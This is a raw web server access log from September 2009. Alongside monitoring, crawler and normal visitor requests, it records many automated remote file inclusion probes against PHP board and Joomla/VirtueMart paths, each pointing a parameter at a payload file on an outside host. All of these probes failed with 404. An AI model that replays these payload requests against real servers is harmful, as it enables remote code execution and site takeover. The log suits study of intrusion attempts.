209.59.12.99 - - [23/Sep/2009:07:18:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.66.81 - - [23/Sep/2009:07:18:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
89.187.131.186 - - [23/Sep/2009:07:18:38 -0400] "GET /index2.php?content=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:18:38 -0400] "GET /logs/index2.php?content=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:18:45 -0400] "GET /index2.php?content=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:18:45 -0400] "GET /logs/index2.php?content=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:18:47 -0400] "GET /logs/access_log.Q109090400/index2.php?content=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:18:49 -0400] "GET /logs/access_log.Q109090400%20%20/index2.php?content=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:19:55 -0400] "GET /logs/index2.php?content=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:19:55 -0400] "GET /index2.php?content=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:19:55 -0400] "GET /logs/access_log.Q109090400/index2.php?content=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.55.105.229 - - [23/Sep/2009:07:20:20 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.229 - - [23/Sep/2009:07:20:22 -0400] "GET /scripts/prototype.js HTTP/1.1" 200 124136 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
211.115.111.122 - - [23/Sep/2009:07:21:10 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:21:10 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:21:12 -0400] "GET /logs/access_log.Q109072200///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:21:28 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.221.88.162 - - [23/Sep/2009:07:21:33 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:21:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:21:34 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:21:34 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:22:15 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
64.221.88.162 - - [23/Sep/2009:07:22:15 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
64.221.88.162 - - [23/Sep/2009:07:22:15 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
64.221.88.162 - - [23/Sep/2009:07:22:15 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
209.59.12.99 - - [23/Sep/2009:07:23:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
188.120.34.217 - - [23/Sep/2009:07:24:32 -0400] "GET //skin/zero_vote/error.php?dir=http://sayphoto.net/bbs//skin/zero_vote/images/zv/idv6.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.831"
188.120.34.217 - - [23/Sep/2009:07:24:32 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://sayphoto.net/bbs//skin/zero_vote/images/zv/idv6.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.831"
188.120.34.217 - - [23/Sep/2009:07:24:32 -0400] "GET /logs/access_log.Q109080800//skin/zero_vote/error.php?dir=http://sayphoto.net/bbs//skin/zero_vote/images/zv/idv6.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.831"
188.120.34.217 - - [23/Sep/2009:07:24:51 -0400] "GET /logs/access_log.Q109081600//skin/zero_vote/error.php?dir=http://sayphoto.net/bbs//skin/zero_vote/images/zv/idv6.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.831"
211.115.111.122 - - [23/Sep/2009:07:25:10 -0400] "GET /logs/access_log.Q109072500%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:25:20 -0400] "GET /logs/access_log.Q109091600%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.188.112.28 - - [23/Sep/2009:07:25:25 -0400] "GET /logs/error_log.Q109071100//common/db.php?commonpath=http://www.forester66.com/components/perkosa.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
209.188.112.28 - - [23/Sep/2009:07:25:25 -0400] "GET /logs//common/db.php?commonpath=http://www.forester66.com/components/perkosa.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
209.188.112.28 - - [23/Sep/2009:07:25:25 -0400] "GET //common/db.php?commonpath=http://www.forester66.com/components/perkosa.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.188.112.28 - - [23/Sep/2009:07:25:25 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://www.forester66.com/components/perkosa.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
209.188.112.28 - - [23/Sep/2009:07:25:28 -0400] "GET //common/db.php?commonpath=http://www.forester66.com/components/perkosa.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.188.112.28 - - [23/Sep/2009:07:25:28 -0400] "GET /logs/error_log.Q109071100//common/db.php?commonpath=http://www.forester66.com/components/perkosa.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
209.188.112.28 - - [23/Sep/2009:07:25:28 -0400] "GET /logs//common/db.php?commonpath=http://www.forester66.com/components/perkosa.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
209.188.112.28 - - [23/Sep/2009:07:25:28 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://www.forester66.com/components/perkosa.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
211.115.111.122 - - [23/Sep/2009:07:27:35 -0400] "GET /logs/access_log.Q109072500%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:27:42 -0400] "GET /logs/access_log.Q109091600%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:27:45 -0400] "GET /logs/error_log.Q109060700//xfsection/modify.php?dir_module=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:27:45 -0400] "GET //xfsection/modify.php?dir_module=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:27:45 -0400] "GET /logs//xfsection/modify.php?dir_module=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:28:01 -0400] "GET /logs/access_log.Q109051100//xfsection/modify.php?dir_module=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:07:28:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [23/Sep/2009:07:28:31 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:07:28:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:07:28:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
211.115.89.7 - - [23/Sep/2009:07:28:34 -0400] "GET //xfsection/modify.php?dir_module=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:28:34 -0400] "GET /logs/error_log.Q109060700//xfsection/modify.php?dir_module=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:28:34 -0400] "GET /logs//xfsection/modify.php?dir_module=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
210.115.58.73 - - [23/Sep/2009:07:28:40 -0400] "GET /logs/access_log.Q109081400///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:28:40 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:28:40 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:28:40 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:28:42 -0400] "GET /logs/access_log.Q109081400///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:28:42 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:28:42 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:28:42 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
211.115.89.7 - - [23/Sep/2009:07:28:42 -0400] "GET /logs/access_log.Q109051100//xfsection/modify.php?dir_module=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:28:52 -0400] "GET /logs//xfsection/modify.php?dir_module=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:28:52 -0400] "GET /logs/error_log.Q109060700//xfsection/modify.php?dir_module=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:28:52 -0400] "GET //xfsection/modify.php?dir_module=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:29:14 -0400] "GET /logs/access_log.Q109051100//xfsection/modify.php?dir_module=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:07:29:58 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:07:29:58 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:07:29:58 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.234.62.129 - - [23/Sep/2009:07:30:27 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.234.62.129 - - [23/Sep/2009:07:30:27 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.234.62.129 - - [23/Sep/2009:07:30:27 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Sep/2009:07:30:46 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:07:30:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:07:30:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.234.62.129 - - [23/Sep/2009:07:30:49 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:07:32:50 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:07:32:50 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:07:32:50 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:07:32:53 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:07:32:53 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:07:32:53 -0400] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.108.75.52 - - [23/Sep/2009:07:32:56 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.108.75.52 - - [23/Sep/2009:07:33:00 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.108.75.52 - - [23/Sep/2009:07:33:00 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:07:33:02 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:07:33:02 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:07:33:02 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:07:33:03 -0400] "GET /logs/access_log.Q109062700//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:07:33:06 -0400] "GET /logs/access_log.Q109062700%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.108.75.52 - - [23/Sep/2009:07:33:12 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.108.75.52 - - [23/Sep/2009:07:33:12 -0400] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.108.75.52 - - [23/Sep/2009:07:33:13 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:07:33:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.75.52 - - [23/Sep/2009:07:33:27 -0400] "GET /logs/access_log.Q109062700//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.108.75.52 - - [23/Sep/2009:07:33:28 -0400] "GET /logs/access_log.Q109062700%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:07:33:39 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:07:33:39 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:07:33:39 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
188.120.34.217 - - [23/Sep/2009:07:33:45 -0400] "GET /logs/access_log.Q109081600%20//skin/zero_vote/error.php?dir=http://sayphoto.net/bbs//skin/zero_vote/images/zv/idv6.txt?%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.831"
204.15.230.189 - - [23/Sep/2009:07:33:49 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.142.121.41 - - [23/Sep/2009:07:34:05 -0400] "GET /logs/index.php?conteudo=http://zi0n.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 212 "-" "-"
219.142.121.41 - - [23/Sep/2009:07:34:05 -0400] "GET /logs/access_log.Q109061000%20/index.php?conteudo=http://zi0n.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 235 "-" "-"
219.142.121.41 - - [23/Sep/2009:07:34:06 -0400] "GET /index.php?conteudo=http://zi0n.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 207 "-" "-"
64.221.88.162 - - [23/Sep/2009:07:34:14 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS)"
64.221.88.162 - - [23/Sep/2009:07:34:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS)"
64.221.88.162 - - [23/Sep/2009:07:34:14 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS)"
64.221.88.162 - - [23/Sep/2009:07:34:14 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS)"
89.108.75.52 - - [23/Sep/2009:07:34:51 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.108.75.52 - - [23/Sep/2009:07:34:51 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.108.75.52 - - [23/Sep/2009:07:34:51 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:07:35:10 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:07:35:10 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:07:35:10 -0400] "GET /logs/access_log.Q109062700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:07:35:23 -0400] "GET /logs/error_log.Q109060400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
210.115.58.73 - - [23/Sep/2009:07:36:08 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:36:08 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:36:08 -0400] "GET /logs/access_log.Q109072000///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:36:09 -0400] "GET /logs/access_log.Q109072000///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:36:09 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:36:09 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
172.16.1.87 - - [23/Sep/2009:07:37:02 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [23/Sep/2009:07:37:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [23/Sep/2009:07:37:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
210.115.58.73 - - [23/Sep/2009:07:37:05 -0400] "GET /logs/access_log.Q109072200///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:37:09 -0400] "GET /logs/access_log.Q109072200///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
61.100.5.136 - - [23/Sep/2009:07:37:23 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:07:37:23 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:07:37:24 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:07:37:35 -0400] "GET /logs/error_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
